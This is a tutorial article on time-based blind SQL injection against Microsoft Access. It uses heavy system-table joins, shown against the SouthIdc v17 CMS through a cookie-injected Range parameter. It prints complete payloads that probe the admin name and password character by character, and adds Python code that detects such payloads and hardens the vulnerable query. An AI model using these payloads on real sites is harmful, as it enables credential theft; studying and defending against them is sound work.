Implementation notes on time-based blind SQL injection against Access databases

php中文网
Published: 2016-06-07 15:21:47
Original
1894 views


  Access is a database management system from Microsoft that combines a database engine with a graphical user interface and software development tools. This article records how time-based blind SQL injection can be carried out against an Access database.

  Overview

  As is well known, Access does not support the time-based blind injection technique as such, but we can use the Access system table MSysAccessObjects to achieve the same effect through heavy queries.

  Initial investigation

  We use the SouthIdcv17 database as the example.

  Running select * from Southidc_About returns the result shown in the figure below.

[Screenshot: result of select * from Southidc_About]

  How do we achieve time-based injection? We rely on the following statement:

  SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,
  MSysAccessObjects AS T7, MSysAccessObjects AS T8, MSysAccessObjects AS T9, MSysAccessObjects AS T10, MSysAccessObjects AS T11, MSysAccessObjects AS T12

  The concrete implementation is as follows:

  select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,
  MSysAccessObjects AS T7, MSysAccessObjects AS T8, MSysAccessObjects AS T9, MSysAccessObjects AS T10, MSysAccessObjects AS T11, MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from
  Southidc_Admin)=97

  Run it once and observe the effect.

  Clearly, it takes about 40 s before the result comes back.

[Screenshot: the query with =97 returning after roughly 40 s]

  When we run the following statement instead, that is, with the final 97 changed to 96:

  select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,
  MSysAccessObjects AS T7, MSysAccessObjects AS T8, MSysAccessObjects AS T9, MSysAccessObjects AS T10, MSysAccessObjects AS T11, MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from
  Southidc_Admin)=96

[Screenshot: the query with =96 returning immediately]

  It finishes very quickly, with no delay.

  Clearly, the part of the WHERE condition


  (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,
  MSysAccessObjects AS T7, MSysAccessObjects AS T8, MSysAccessObjects AS T9, MSysAccessObjects AS T10, MSysAccessObjects AS T11, MSysAccessObjects AS T12)>0

  is what produces the delay. Note, however, that the order of the conditions after WHERE matters: the delaying subquery must come before

  (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=97

  Why? That is simply what the experiments show.
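From the defender's side, the heavy-query primitive described above has a very recognisable shape: many self-joins of an Access MSys* system table, often next to a per-character asc(mid(...)) probe. The following is an added example, not code from the original post; it scans every input channel of a request, cookies included, for that shape. The regexes, the threshold and the sample request are assumptions, and the cookie value is the payload shown later in the post, embedded here as constructed input.

```python
import re
from urllib.parse import unquote

# Added example (not from the original post): flag request inputs that carry an
# Access "heavy query", i.e. many self-joins of a MSys* system table, which is the
# primitive the post uses to build a time delay. Names and thresholds are assumptions.

# One alias per joined copy of a system table, e.g. "MSysAccessObjects AS T7".
SYSTEM_TABLE_ALIAS_RE = re.compile(r"\bMSys\w*\s+AS\s+\w+", re.IGNORECASE)
# A per-character probe of the kind shown in the post: asc(mid(...)) compared to a number.
CHAR_PROBE_RE = re.compile(r"\basc\s*\(\s*mid\s*\(", re.IGNORECASE)

# No legitimate request parameter joins copies of a system table at all, so the
# threshold only needs to be low; three avoids noise from a lone table name.
HEAVY_JOIN_THRESHOLD = 3


def heavy_query_score(value: str) -> dict:
    """Return indicators for one raw input value (URL decoding is applied first)."""
    decoded = unquote(value)
    return {
        "system_table_aliases": len(SYSTEM_TABLE_ALIAS_RE.findall(decoded)),
        "char_probe": CHAR_PROBE_RE.search(decoded) is not None,
    }


def scan_request(request: dict) -> list:
    """Scan every input channel and return (channel, name, alias_count) hits.

    The application in the post only filtered GET and POST, so cookie values reached
    the query untouched; a detector that skips the cookie channel misses exactly that.
    """
    hits = []
    for channel, params in request.items():
        for name, value in params.items():
            score = heavy_query_score(value)
            if score["system_table_aliases"] >= HEAVY_JOIN_THRESHOLD or score["char_probe"]:
                hits.append((channel, name, score["system_table_aliases"]))
    return hits


# Constructed sample request: benign GET/POST values plus the cookie payload from the
# post, placed in the channel a GET/POST-only filter would not inspect.
HEAVY_COOKIE = (
    "DownSort where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, "
    "MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, "
    "MSysAccessObjects AS T6, MSysAccessObjects AS T7, MSysAccessObjects AS T8, "
    "MSysAccessObjects AS T9, MSysAccessObjects AS T10, MSysAccessObjects AS T11, "
    "MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) "
    "from Southidc_Admin)=32 and 1=1 union select NULL,NULL,NULL,NULL,NULL,NULL from Southidc_image"
)

SAMPLE_REQUEST = {
    "get": {"ParentID": "1"},
    "post": {},
    "cookie": {"Range": HEAVY_COOKIE, "session": "abc123"},
}

if __name__ == "__main__":
    for channel, name, aliases in scan_request(SAMPLE_REQUEST):
        print("heavy-query indicator in %s parameter %r (%d system-table aliases)"
              % (channel, name, aliases))
```

The alias count is also a useful severity signal: because each extra self-join multiplies the row count the engine has to enumerate, twelve copies (as in the post) indicates a deliberate delay rather than an ordinary query fragment that happens to mention a system table.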

  Practical implementation

  SouthIdc 17 contains a SQL injection vulnerability, but the conventional methods cannot exploit it successfully. The vulnerable code is as follows:

[Screenshot: the vulnerable code]

  Although the program filters POST and GET data, we can still inject by submitting the value through a cookie.

  Now let us implement the exploitation.

  The statement we need to inject into is:

  select * from Southidc_"&request("Range")&"Sort where ViewFlag and ParentID="&ParentID&" order by ID asc

  By submitting the cookie

  Range=DownSort where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=32 and 1=1 union select NULL,NULL,NULL,NULL,NULL,NULL from Southidc_image

  ParentID is a value passed in from earlier in the program, so the final statement is:

  select * from Southidc_DownSort where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=32 and 1=1 union select NULL,NULL,NULL,NULL,NULL,NULL from Southidc_imageSort where ViewFlag and ParentID=1

  We can check the effect in the query tool.

  With 96 there is no delay, as shown:

[Screenshot: the final statement with =96, no delay]

  With 97 there is a delay, as shown below:

[Screenshot: the final statement with =97, delayed]
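The root cause in the vulnerable line above is twofold: the Range value is spliced into a table name by string concatenation, and the value is read with Request("Range") without naming a collection, which in Classic ASP searches QueryString, Form, Cookies, ClientCertificate and ServerVariables in that order, so a filter applied only to GET and POST leaves the cookie path open. The following is an added example, not the original ASP code: a Python model of that lookup order and concatenation beside a hardened builder that accepts the identifier only from a fixed allowlist and binds ParentID as a parameter. The allowlist contents, the helper names and the cookie value are assumptions (the cookie is a shortened, constructed variant of the payload in the post).

```python
# Added example (not the original ASP code): a model of the vulnerable concatenation
# shown in the post, the input lookup order that lets a cookie reach it, and a fix.


def request_value(name, query, form, cookies, default=""):
    """Model of Classic ASP Request("name") with no collection named: QueryString is
    searched first, then Form, then Cookies (ClientCertificate and ServerVariables,
    which come after Cookies, are omitted here)."""
    for collection in (query, form, cookies):
        if name in collection:
            return collection[name]
    return default


def build_sort_query_vulnerable(range_value: str, parent_id) -> str:
    """The post's pattern: Range becomes part of a table name by string concatenation,
    and ParentID is concatenated as well."""
    return ("select * from Southidc_" + range_value + "Sort where ViewFlag and ParentID="
            + str(parent_id) + " order by ID asc")


# Hypothetical allowlist: the table-name suffixes the application is known to use.
# Identifiers cannot be bound as parameters, so they must come from a fixed set.
ALLOWED_RANGES = frozenset({"Down", "image"})


def build_sort_query_safe(range_value: str, parent_id) -> tuple:
    """Hardened form: identifier from the allowlist, ParentID as a bound parameter.
    Returns (sql, params) for a DB-API style execute(sql, params) call."""
    if range_value not in ALLOWED_RANGES:
        raise ValueError("unexpected Range value: %r" % range_value[:40])
    pid = int(parent_id)  # raises ValueError for anything that is not an integer
    sql = ("select * from Southidc_%sSort where ViewFlag and ParentID=? order by ID asc"
           % range_value)
    return sql, (pid,)


# Constructed request: GET and POST have been filtered (Range is absent there),
# while the cookie carries a shortened variant of the payload from the post.
FILTERED_QUERY = {"ParentID": "1"}
FILTERED_FORM = {}
COOKIES = {
    "Range": "DownSort where (SELECT count(*) FROM MSysAccessObjects AS T1, "
             "MSysAccessObjects AS T2)>0 and 1=1 union select "
             "NULL,NULL,NULL,NULL,NULL,NULL from Southidc_image"
}


def demo():
    """Resolve Range and ParentID the way the vulnerable page does, then build the
    query both ways. Returns (vulnerable_sql, safe_result_or_None)."""
    range_value = request_value("Range", FILTERED_QUERY, FILTERED_FORM, COOKIES)
    parent_id = request_value("ParentID", FILTERED_QUERY, FILTERED_FORM, COOKIES)
    vulnerable = build_sort_query_vulnerable(range_value, parent_id)
    try:
        safe = build_sort_query_safe(range_value, parent_id)
    except ValueError:
        safe = None  # the hardened builder refuses the cookie-supplied identifier
    return vulnerable, safe


if __name__ == "__main__":
    vulnerable_sql, safe_result = demo()
    print("vulnerable:", vulnerable_sql)
    print("hardened  :", safe_result)
```

The allowlist check is what closes the channel problem: once the identifier can only be one of a few known strings, it no longer matters whether it arrived via the query string, a form field or a cookie, and the remaining user-controlled value, ParentID, travels as a bound parameter rather than as SQL text.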

  Next, the statements above can be used to write an exploit; the author uses Python here.

  The core code is as follows:

[Screenshot: core Python code]
